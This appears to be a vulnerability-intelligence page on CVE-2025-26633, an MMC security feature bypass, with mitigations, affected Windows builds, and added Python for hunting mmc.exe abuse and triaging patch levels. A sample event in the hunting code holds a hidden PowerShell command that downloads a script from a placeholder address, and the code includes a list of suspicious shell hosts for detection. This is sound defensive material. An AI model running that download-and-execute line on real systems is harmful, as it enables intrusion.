Cyber Posture

CVE-2025-26633

High · CISA KEV · Active Exploitation · Public PoC · Ransomware-linked

Published: 11 March 2025
Modified: 27 October 2025
KEV Added: 11 March 2025
Patch: available from Microsoft's update guide (linked under Deeper analysis)
CVSS Score: 7.0 (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
EPSS Score: 0.4252 (97.5th percentile)
Risk Priority: 60 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-26633 is a high-severity improper neutralization (CWE-707) vulnerability in the Microsoft Management Console (MMC). It affects supported Windows 10, Windows 11 and Windows Server releases, not only Windows 10 21H2 (see Affected Products). Its CVSS v3.1 base score is 7.0 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique System Binary Proxy Execution: MMC (T1218.014). The CVE ranks in the top 2.5% of all CVEs by exploit likelihood (EPSS 97.5th percentile), CISA has added it to the Known Exploited Vulnerabilities catalog, and a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 RA-5 (Vulnerability Monitoring and Scanning) and SI-10 (Information Input Validation).

Threat & Defense at a Glance

What attackers do: exploitation maps to System Binary Proxy Execution: MMC (T1218.014). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5) · AI

prevent (vendor patching): Directly remediates the improper neutralization flaw in Microsoft Management Console by applying the security update from Microsoft's update guide without delay.

prevent, SI-10 (Information Input Validation): Addresses the root cause of the CWE-707 improper neutralization by validating inputs to MMC, preventing security feature bypass exploits.

detect, RA-5 (Vulnerability Monitoring and Scanning): Scans and monitors for known vulnerabilities such as CVE-2025-26633 in MMC, so that affected hosts can be identified and prioritized for remediation given the CVE's presence in the CISA KEV catalog.

MITRE ATT&CK Enterprise Techniques · AI

T1218.014 System Binary Proxy Execution: MMC (Stealth)
Adversaries may abuse mmc.exe to proxy execution of malicious .msc files.

Why these techniques?

The vulnerability is a local security feature bypass in MMC; it lets an adversary use MMC to proxy execution of malicious payloads or snap-ins while evading the intended controls.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
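Hunting for the T1218.014 behaviour described above does not depend on the details of this particular flaw: the telemetry signal is mmc.exe loading a console file (.msc) from somewhere other than System32, or mmc.exe spawning a shell or script host. The Python below is an added example, not code from the Cyber Posture page or from MITRE. The events are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, User), not captured logs; the rule names, the System32/SysWOW64 allow-list, the list of suspicious child processes and the TEST-NET address in the last event are the example's own choices.

```python
"""Added example (not from the Cyber Posture page or MITRE): two hunting rules for
T1218.014 (System Binary Proxy Execution: MMC) over process-creation events."""
import ntpath
import re

# Console files shipped with Windows live here; an .msc loaded from anywhere else
# (Downloads, Temp, a share, a path that traverses out of System32) is worth a look.
SYSTEM_MSC_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# A quoted path (may contain spaces) or an unquoted token ending in .msc.
MSC_RE = re.compile(r'"([^"]+?\.msc)"|(\S+?\.msc)\b', re.IGNORECASE)

# Children that a console file should never need to launch.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed events in the shape of Sysmon Event ID 1 fields; not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\eventvwr.msc" /s',
     "User": r"CORP\alice"},                      # benign: built-in console from System32
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\Q1 Report.msc"',
     "User": r"CORP\alice"},                      # .msc delivered to the user's Downloads
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\..\Temp\diag.msc',
     "User": r"CORP\bob"},                        # looks like System32, resolves to Temp
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c iwr http://198.51.100.7/s.ps1",
     "User": r"CORP\alice"},                      # console spawning a hidden shell
]


def msc_paths(command_line: str) -> list[str]:
    """Every .msc argument on the command line, quoted or not."""
    return [quoted or bare for quoted, bare in MSC_RE.findall(command_line)]


def outside_system_dirs(path: str) -> bool:
    """True unless the .msc resolves to System32/SysWOW64 after normalizing '..' and case.

    A relative name (mmc.exe eventvwr.msc) or an unexpanded %SystemRoot% cannot be
    resolved from the command line alone, so it is surfaced rather than trusted."""
    if not ntpath.isabs(path):
        return True
    normalized = ntpath.normpath(path).lower()
    return not any(normalized.startswith(d + "\\") for d in SYSTEM_MSC_DIRS)


def evaluate(event: dict) -> list[str]:
    """Names of the rules this event trips; an empty list means nothing fired."""
    hits = []
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    if image == "mmc.exe" and any(outside_system_dirs(p) for p in msc_paths(event["CommandLine"])):
        hits.append("mmc_loads_msc_outside_system32")
    if parent == "mmc.exe" and image in SUSPICIOUS_CHILDREN:
        hits.append("mmc_spawns_shell_or_script_host")
    return hits


def hunt(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """(index, user, rules) for each event that trips at least one rule."""
    findings = []
    for index, event in enumerate(events):
        rules = evaluate(event)
        if rules:
            findings.append((index, event["User"], rules))
    return findings


if __name__ == "__main__":
    for index, user, rules in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {user}: {', '.join(rules)}")
```

The third sample event is the reason the path is normalized before the allow-list check: a command line that begins with C:\Windows\System32 but traverses out of it would pass a naive prefix match. Relative console names are deliberately surfaced, because which file mmc.exe loads in that case is decided by its search order, not by the command line; expect to baseline those against normal admin activity in your environment.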

NVD Description

Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally.

Deeper analysis · AI

CVE-2025-26633 is an improper neutralization vulnerability in the Microsoft Management Console (MMC) that enables an unauthorized attacker to bypass a security feature locally. Published on 2025-03-11, the issue is associated with CWE-707 and carries a CVSS v3.1 base score of 7.0 (AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H), indicating high potential impact despite requiring local access and user interaction.

Exploitation requires local access to the system and user interaction, and carries high attack complexity, but it needs no privileges. Successful exploitation bypasses MMC's security controls and yields high impact on confidentiality, integrity and availability.

Microsoft's Security Response Center provides an update guide for remediation at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633. Vicarius offers a detection script at https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script and a mitigation script at https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script.

The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog at https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-26633, indicating real-world exploitation.

Details

CWE(s): CWE-707 (Improper Neutralization)
KEV Date Added: 11 March 2025

Affected Products

The build numbers below are the builds that contain the fix; a host is affected when its build on that branch is earlier than the one listed, and the listed build itself is patched.

Microsoft Windows 10 1507: versions before 10.0.10240.20947
Microsoft Windows 10 1607: versions before 10.0.14393.7876
Microsoft Windows 10 1809: versions before 10.0.17763.7009
Microsoft Windows 10 21H2: versions before 10.0.19044.5608
Microsoft Windows 10 22H2: versions before 10.0.19045.5608
Microsoft Windows 11 22H2: versions before 10.0.22621.5039
Microsoft Windows 11 23H2: versions before 10.0.22631.5039
Microsoft Windows 11 24H2: versions before 10.0.26100.3403
Microsoft Windows Server 2008 and 2008 R2: all versions
Microsoft Windows Server 2012 and 2012 R2: all versions
+5 more product configurations; see NVD for the full list.
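The RA-5 control recommended above comes down to comparing each host's full build against the fixed builds in this table. The following Python is an added example, not code from the Cyber Posture page or from Microsoft: it encodes the eight build thresholds listed here (the Server 2008 and 2012 rows carry no build number on this page, so those branches come back as unknown), treats a build strictly below the threshold as affected, and triages a constructed inventory. On a real host the two halves of the build string come from the CurrentBuild and UBR values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion; the hostnames and builds below are made up.

```python
"""Added example (not from the Cyber Posture page or Microsoft): triage Windows
hosts against the fixed builds for CVE-2025-26633 listed under Affected Products."""

# Fixed builds from this entry's Affected Products table, keyed by the branch's
# CurrentBuild number. A host is affected when its full build sorts *below* the
# fixed build; the fixed build itself (and anything newer) is patched.
FIXED_BUILDS = {
    10240: ("Windows 10 1507", (10, 0, 10240, 20947)),
    14393: ("Windows 10 1607", (10, 0, 14393, 7876)),
    17763: ("Windows 10 1809", (10, 0, 17763, 7009)),
    19044: ("Windows 10 21H2", (10, 0, 19044, 5608)),
    19045: ("Windows 10 22H2", (10, 0, 19045, 5608)),
    22621: ("Windows 11 22H2", (10, 0, 22621, 5039)),
    22631: ("Windows 11 23H2", (10, 0, 22631, 5039)),
    26100: ("Windows 11 24H2", (10, 0, 26100, 3403)),
}

# Constructed inventory (hostnames and builds are made up). The build string is
# CurrentBuild and UBR from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion,
# joined onto the 10.0 (or 6.x) prefix the way winver shows it.
SAMPLE_INVENTORY = {
    "ws-finance-07": "10.0.19045.5371",  # 22H2, before the March 2025 update
    "ws-dev-12": "10.0.22631.5039",      # 23H2, exactly the fixed build
    "ws-dev-13": "10.0.26100.3476",      # 24H2, newer than the fixed build
    "srv-legacy-02": "6.3.9600.22321",   # Server 2012 R2: no build threshold on this page
}


def parse_build(version: str) -> tuple[int, int, int, int]:
    """Turn '10.0.19045.5371' into a 4-tuple that compares numerically, not as text
    (as text, '973' would sort after '7009' and hide an unpatched 1809 host)."""
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"expected MAJOR.MINOR.BUILD.UBR, got {version!r}")
    major, minor, build, ubr = (int(p) for p in parts)
    return (major, minor, build, ubr)


def assess(version: str) -> dict:
    """Classify one build string as 'vulnerable', 'patched' or 'unknown' (branch not in table)."""
    full = parse_build(version)
    entry = FIXED_BUILDS.get(full[2])
    if entry is None:
        return {"product": None, "status": "unknown", "fixed_build": None}
    product, fixed = entry
    status = "vulnerable" if full < fixed else "patched"
    return {"product": product, "status": status, "fixed_build": ".".join(map(str, fixed))}


def triage(inventory: dict[str, str]) -> list[tuple[str, str, str]]:
    """Hosts still needing attention as (host, status, product), vulnerable ones first."""
    rows = []
    for host, version in inventory.items():
        result = assess(version)
        if result["status"] != "patched":
            rows.append((host, result["status"], result["product"] or "branch not in table"))
    rows.sort(key=lambda row: row[1] != "vulnerable")  # False (vulnerable) sorts first
    return rows


if __name__ == "__main__":
    for host, status, product in triage(SAMPLE_INVENTORY):
        print(f"{host:15} {status:11} {product}")
```

Feed it the output of whatever already collects build numbers for you (an endpoint agent export, a CSV from a scanner, or a remote registry query); the point is that the comparison is numeric on all four fields and that a branch this page does not cover is reported rather than silently marked clean.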

CVEs Like This One

CVE-2025-24985 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-24993 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-24991 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-24054 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-59230 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-24990 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-24984 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2025-21418 · same product (Microsoft Windows 10 1607) · both on KEV
CVE-2025-21391 · same product (Microsoft Windows 10 1507) · both on KEV
CVE-2026-21510 · same product (Microsoft Windows 10 1607) · both on KEV
